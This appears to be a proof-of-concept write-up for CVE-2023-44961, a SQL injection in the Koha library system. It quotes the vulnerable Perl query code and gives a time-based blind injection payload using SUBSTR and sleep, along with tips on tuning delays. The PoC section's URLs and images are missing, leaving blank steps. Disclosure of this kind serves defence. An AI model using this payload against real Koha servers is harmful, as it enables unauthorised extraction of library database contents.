# CVE-2023-44961
PoC for CVE-2023-44961

# Description
This is a SQL Injection vulnerability in Koha Library Software v. and before version which allows a remote attacker to obtain arbitrary data from the koha sql server.

# Analysis

This vulnerability appears in the `intranet/cgi bin/cataloging/` file of the `intranet` interface:

my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data
die() unless ($table eq "biblioitems"); 


my $dbh = C4::Context->dbh;
my $sql = qq(SELECT distinct $field
             FROM $table 
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");

When concatenating SQL statements with the `$sql` variable in the code, keyword filtering was not performed. We can achieve time-based SQL blind injection by injecting the following payload:

$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))

The sql command after concatenation is:

SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))

Since `SELECT distinct $field FROM $table  WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?` is used to return the values of all the `$field` fields in the `$table` that meet one of the three `LIKE` conditions, it will traverse each row of data in the `$table`. 

Therefore, if you want to reduce the sleep time, set the sleep time to `1/n` (n represents the number of rows of data in the `$table`), that is, `sleep (1/n)`.

## PoC

To trigger the SQL injection vulnerability here, first ensure that there is data in the `biblioitems` table. We can add data through the following URL:


I have added a piece of data here:


Test our SQL statements on the command line:


It can be seen that in the `biblioitems` table, with one piece of data, the sleep is set to 1 second, and the actual sleep time is 3 seconds. 

Following this approach,  a PoC can be constructed for testing:

Access the following url to trigger:



As shown in the figure  my database name is `koha_mykoha`.